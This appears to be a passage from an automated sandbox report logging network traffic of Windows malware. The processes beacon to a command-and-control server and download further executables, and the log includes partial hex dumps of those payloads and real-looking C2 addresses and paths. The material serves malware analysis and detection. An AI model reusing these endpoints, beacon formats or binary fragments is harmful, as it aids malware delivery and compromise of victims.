                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:50.281868935 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:49 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            31192.168.2.449906185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:51.069314957 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019675001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:52.391155958 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:52 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            32192.168.2.44990731.41.244.11801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:52.599030018 CET63OUTGET /files/zhigarko/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:53.896505117 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:53 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 439296
                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 08:14:10 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "676678d2-6b400"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 01 33 64 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 27 a0 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)#,(,/,),,(,-,-j,U%,U,U.,Rich,PEL3dg'@0@EE8@<.textj `.rdataHJ@@.datam`,@@.rsrcl@@.relocEFn@B
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:53.896518946 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 50 ca 44 00 e8 87 8d 02 00 59 c3 cc cc cc cc 68 f0 c9 44 00 e8 77 8d 02 00 59
                                                                                                                                                                                                                                                            Data Ascii: hPDYhDwYj hEdnF/hDVYj hEtFo/hD6YjhETuFO/hpDYj h$EoF//hDYjhHEL
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:53.896568060 CET1236INData Raw: 74 46 00 e8 0f 2f 02 00 68 30 cc 44 00 e8 d6 8c 02 00 59 c3 cc cc cc 6a 24 68 5c d0 45 00 b9 8c 6d 46 00 e8 ef 2e 02 00 68 90 cc 44 00 e8 b6 8c 02 00 59 c3 cc cc cc 6a 00 68 7b ce 45 00 b9 24 75 46 00 e8 cf 2e 02 00 68 f0 cc 44 00 e8 96 8c 02 00
                                                                                                                                                                                                                                                            Data Ascii: tF/h0DYj$h\EmF.hDYjh{E$uF.hDYjh{EuF.hPDvYjh{EoF.hDVYjh{EmFo.hD6YjhEnFO.hpDYjhE8xF/.hDY
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:53.896745920 CET1236INData Raw: cc cc cc 6a 0c 68 38 d3 45 00 b9 2c 6d 46 00 e8 2f 2a 02 00 68 d0 da 44 00 e8 f6 87 02 00 59 c3 cc cc cc 6a 0c 68 48 d3 45 00 b9 c4 6e 46 00 e8 0f 2a 02 00 68 30 db 44 00 e8 d6 87 02 00 59 c3 cc cc cc 6a 04 68 58 d3 45 00 b9 98 78 46 00 e8 ef 29
                                                                                                                                                                                                                                                            Data Ascii: jh8E,mF/*hDYjhHEnF*h0DYjhXExF)hDYjh`ExF)hDYjhhEuF)hPDvYjhpEwF)hDVYjhxEnFo)hD6YjhE(yFO)
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:53.896773100 CET448INData Raw: 68 10 e9 44 00 e8 36 83 02 00 59 c3 cc cc cc 6a 08 68 4c d5 45 00 b9 bc 76 46 00 e8 4f 25 02 00 68 70 e9 44 00 e8 16 83 02 00 59 c3 cc cc cc 6a 10 68 58 d5 45 00 b9 34 71 46 00 e8 2f 25 02 00 68 d0 e9 44 00 e8 f6 82 02 00 59 c3 cc cc cc 6a 10 68
                                                                                                                                                                                                                                                            Data Ascii: hD6YjhLEvFO%hpDYjhXE4qF/%hDYjhlEwF%h0DYjhEyF$hDYjhEluF$hDYj@hEoF$hPDvYjhElrF$hDVYjLh
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:53.896789074 CET1236INData Raw: 68 50 ee 44 00 e8 76 81 02 00 59 c3 cc cc cc 6a 50 68 f0 d6 45 00 b9 50 78 46 00 e8 8f 23 02 00 68 b0 ee 44 00 e8 56 81 02 00 59 c3 cc cc cc 6a 10 68 44 d7 45 00 b9 9c 6c 46 00 e8 6f 23 02 00 68 10 ef 44 00 e8 36 81 02 00 59 c3 cc cc cc 6a 34 68
                                                                                                                                                                                                                                                            Data Ascii: hPDvYjPhEPxF#hDVYjhDElFo#hD6Yj4hXEvFO#hpDYjhEpF/#hDYjPhEnF#h0DYj@hExF"hDYjh<EtvF"hDYjhL
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:53.896985054 CET224INData Raw: e8 a7 7c 02 00 59 c3 cc cc cc cc 6a 40 68 c8 da 45 00 b9 3c 6f 46 00 e8 bf 1e 02 00 68 b0 fd 44 00 e8 86 7c 02 00 59 c3 cc cc cc 6a 3f 68 18 db 45 00 b9 14 73 46 00 e8 9f 1e 02 00 68 10 fe 44 00 e8 66 7c 02 00 59 c3 cc cc cc 68 70 ff 44 00 e8 57
                                                                                                                                                                                                                                                            Data Ascii: |Yj@hE<oFhD|Yj?hEsFhDf|YhpDW|YjhFkhD;|jhFkhE|jyhE@F{hE{YhPE{YjD
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:53.897092104 CET1236INData Raw: 7e 02 00 b8 c4 60 46 00 c7 45 f0 68 60 46 00 89 45 ec 83 65 fc 00 c7 05 c4 60 46 00 4c 16 45 00 c7 45 fc 01 00 00 00 68 3c 3a 46 00 50 68 74 60 46 00 e8 15 58 02 00 83 4d fc ff 68 06 01 45 00 e8 87 7b 02 00 83 c4 10 e8 1f 7e 02 00 c3 6a 08 b8 df
                                                                                                                                                                                                                                                            Data Ascii: ~`FEh`FEe`FLEEh<:FPht`FXMhE{~jD5~\`FE`FEe\`F0EEh:FPh`FWMhE0{}h0FF^$E{YjhFjhEz,Fs_h.EzYh$E
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:53.897108078 CET1236INData Raw: cc cc cc cc cc cc cc 68 68 ce 45 00 e8 42 5d 02 00 cc cc cc cc cc cc 55 8b ec 83 ec 0c a1 24 61 46 00 33 c5 89 45 fc 8b 55 08 8d 45 f4 56 8b f1 89 55 f4 8d 4e 04 c6 45 f8 01 51 0f 57 c0 c7 06 24 16 45 00 50 66 0f d6 01 e8 8a 84 02 00 8b 4d fc 83
                                                                                                                                                                                                                                                            Data Ascii: hhEB]U$aF3EUEVUNEQW$EPfM0E3^3p]UVWFP$EfEP>0E^]UEu]PaUEUH]
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:53.897125959 CET1236INData Raw: 08 56 e8 32 72 02 00 83 c4 08 8b c6 5e 5d c2 04 00 cc cc b8 84 ce 45 00 c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c 56 83 f8 01 75 2f 8b 75 08 8b ce 6a 15 68 78 df 45 00 c7 06 00 00 00 00 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 c6 06 00
                                                                                                                                                                                                                                                            Data Ascii: V2r^]EUEVu/ujhxEFF^]WPo^uFyFAu+QR_^]kFU$aF3EVEENEQEW$EPfM
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:54.016083002 CET1236INData Raw: 8b ec 6a ff 68 dd 85 44 00 64 a1 00 00 00 00 50 83 ec 0c 53 56 57 a1 24 61 46 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b d9 8b 7d 08 8d 73 0c 56 c6 45 f3 00 89 75 ec e8 ce 5c 02 00 83 c4 04 85 c0 0f 85 f5 00 00 00 89 45 fc 8b 43 3c 85 c0 74 51 33
                                                                                                                                                                                                                                                            Data Ascii: jhDdPSVW$aF3PEd}sVEu\EC<tQ3H98tu uK<JxuS@jPl_GHuPE_VEy\}ti3tXw$1@JK;tCt7w


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            33192.168.2.449910185.156.73.23807124C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:53.699099064 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:55.031379938 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:54 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            34192.168.2.449916185.156.73.23807124C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:57.317342997 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:58.647229910 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:58 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            35192.168.2.449918185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:57.869206905 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019676001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:59.248435020 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            36192.168.2.44992631.41.244.11801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:59.394421101 CET68OUTGET /files/kardanvalov88/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:00.718324900 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:00 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 605696
                                                                                                                                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 15:01:10 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "675afab6-93e00"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MBBvvBvcRBBBwBw+CBwRichPEd11g")l2@``HtLpp(@@.text> `.rdatad@@.data;@.pdatatLN@@.rsrcH`,@@.relocp2@B
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:00.718343973 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 55 48 8d ac 24 50 fe ff ff 48 81 ec b0 02 00 00 0f 57 c0 0f 11 44 24 30 0f 57
                                                                                                                                                                                                                                                            Data Ascii: @UH$PHWD$0WfL$@A H)HL$0g4WD$PWfL$`AHHL$P>4WD$pWfMA HHL$p4WEWfMAHHM3WEWf
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:00.718524933 CET448INData Raw: 48 8d 4d b0 e8 fa 2f 02 00 90 0f 57 c0 0f 11 45 d0 0f 57 c9 66 0f 7f 4d e0 41 b8 21 00 00 00 48 8d 15 dd a9 07 00 48 8d 4d d0 e8 d4 2f 02 00 90 0f 57 c0 0f 11 45 f0 0f 57 c9 66 0f 7f 4d 00 41 b8 20 00 00 00 48 8d 15 07 a8 07 00 48 8d 4d f0 e8 ae
                                                                                                                                                                                                                                                            Data Ascii: HM/WEWfMA!HHM/WEWfMA HHM/WEWfM A!HHM/WE0WfM@A HHM0b/WEPWfM`A!HHMP</WEpWfA HHMp/W
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:00.718542099 CET1236INData Raw: 00 00 41 b8 21 00 00 00 48 8d 15 fc a8 07 00 48 8d 8d 10 01 00 00 e8 28 2e 02 00 90 0f 57 c0 0f 11 85 30 01 00 00 0f 57 c9 66 0f 7f 8d 40 01 00 00 41 b8 20 00 00 00 48 8d 15 55 a7 07 00 48 8d 8d 30 01 00 00 e8 f9 2d 02 00 90 0f 57 c0 0f 11 85 50
                                                                                                                                                                                                                                                            Data Ascii: A!HH(.W0Wf@A HUH0-WPWf`A!HHP-WpWfA H/Hp-WWfA!HHl-HD$0HD$ HHD$((D$
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:00.718667984 CET1236INData Raw: 00 00 00 48 8d 15 65 a5 07 00 48 8d 4d e0 e8 5c 29 02 00 90 0f 57 c0 0f 11 45 00 0f 57 c9 66 0f 7f 4d 10 41 b8 6a 00 00 00 48 8d 15 df a6 07 00 48 8d 4d 00 e8 36 29 02 00 90 0f 57 c0 0f 11 45 20 0f 57 c9 66 0f 7f 4d 30 41 b8 08 00 00 00 48 8d 15
                                                                                                                                                                                                                                                            Data Ascii: HeHM\)WEWfMAjHHM6)WE WfM0AHIHM )WE@WfMPAoHHM@(3HHP]HH@HHWfHH?LH
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:00.718683958 CET1236INData Raw: 83 c4 28 e9 5f 0d 04 00 cc cc cc 48 83 ec 28 41 b9 01 00 00 00 48 8d 15 ff cf 08 00 45 33 c0 48 8d 0d 85 cf 08 00 e8 a0 e2 01 00 48 8d 0d c5 da 06 00 48 83 c4 28 e9 2c 0d 04 00 40 53 48 83 ec 20 b9 02 00 00 00 e8 b8 77 04 00 48 8d 0d c9 cf 08 00
                                                                                                                                                                                                                                                            Data Ascii: (_H(AHE3HHH(,@SH wHH!HE3HHHAHH [HHHHcHHHDPHHcHLH(HH}H(HQHJH
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:00.718928099 CET672INData Raw: 20 5b c3 cc cc cc cc 44 89 02 48 8b c2 48 89 4a 08 c3 cc cc cc cc cc 40 53 48 83 ec 30 48 8b 01 49 8b d8 44 8b c2 48 8d 54 24 20 ff 50 18 48 8b 4b 08 4c 8b 48 08 48 8b 51 08 49 39 51 08 75 0e 8b 0b 39 08 75 08 b0 01 48 83 c4 30 5b c3 32 c0 48 83
                                                                                                                                                                                                                                                            Data Ascii: [DHHJ@SH0HIDHT$ PHKLHHQI9Qu9uH0[2H0[HBLHL9IuD9u2HyHAHH9HAH@SVWH)$HHHL$ IHL$h%HHD$ 6Hxt
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:00.719078064 CET1236INData Raw: 8b 4a 08 48 8d 54 24 28 48 8b 01 ff 50 10 48 8d 54 24 28 48 8b cb e8 9c fc ff ff 48 8b 54 24 40 48 83 fa 0f 76 2e 48 8b 4c 24 28 48 ff c2 48 8b c1 48 81 fa 00 10 00 00 72 15 48 8b 49 f8 48 83 c2 27 48 2b c1 48 83 c0 f8 48 83 f8 1f 77 24 e8 c3 ff
                                                                                                                                                                                                                                                            Data Ascii: JHT$(HPHT$(HHT$@Hv.HL$(HHHrHIH'H+HHw$HHHCH\$pHP_?HxHL$0BHT$ HL$@)D$ ;HHL$@!H\$WH HHHHQHWHK
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:00.719094038 CET1236INData Raw: cc cc cc 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8d 05 33 de 06 00 48 8b d9 48 89 01 f6 c2 01 74 0a ba 08 00 00 00 e8 0e fb 03 00 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc 48 89 5c 24 10 48 89 4c 24 08 57 48 83 ec 20
                                                                                                                                                                                                                                                            Data Ascii: 3@SH H3HHtHH [H\$HL$WH HH383HCCHCC HC(fC0HC8fC@HCHCPHCXC`HtHHQHH\$8H _HH\$WH HHKXHt3H{XHKHHt
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:00.719110012 CET1236INData Raw: 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc 48 89 5c 24 10 48 89 74 24 18 55 57 41 56 48 8d 6c 24 b9 48 81 ec c0 00 00 00 48 8b da 48 8b f9 45 33 f6 48 85 c9 0f 84 5d 01 00 00 4c 39 31 0f 85 54 01 00 00 b9 60 00 00 00 e8 c9 f8 03 00 48 8b f0 48
                                                                                                                                                                                                                                                            Data Ascii: \$0H _H\$Ht$UWAVHl$HHHE3H]L91T`HHEgHKHtHY(HuHY0Hk3HMDLuELuELufDuLufDuLuELuEHHHMTDvHLHHM\HFN HM
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:00.838162899 CET1236INData Raw: 41 0f b6 d8 4c 8d 49 30 4c 8d 44 24 20 48 c7 44 24 20 00 00 00 00 48 8d 4c 24 28 e8 d3 da 03 00 0f b6 54 24 28 83 f8 01 0f 45 d3 0f b6 c2 48 8b 4c 24 30 48 33 cc e8 40 f1 03 00 48 83 c4 40 5b c3 cc cc cc cc cc cc cc cc cc cc 40 53 56 57 41 56 48
                                                                                                                                                                                                                                                            Data Ascii: ALI0LD$ HD$ HL$(T$(EHL$0H3@H@[@SVWAVHHHH3HD$0H$IEHI;tcH$Hi0L|$@E3@LD$ LL|$ HL$(>T$(HAEHWH;uL|$@H$HHL$0H3HHA


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            37192.168.2.449929185.156.73.23807124C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:01.169630051 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:02.420156002 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:02 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            38192.168.2.449943185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:04.731075048 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019677001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.049731970 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:05 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
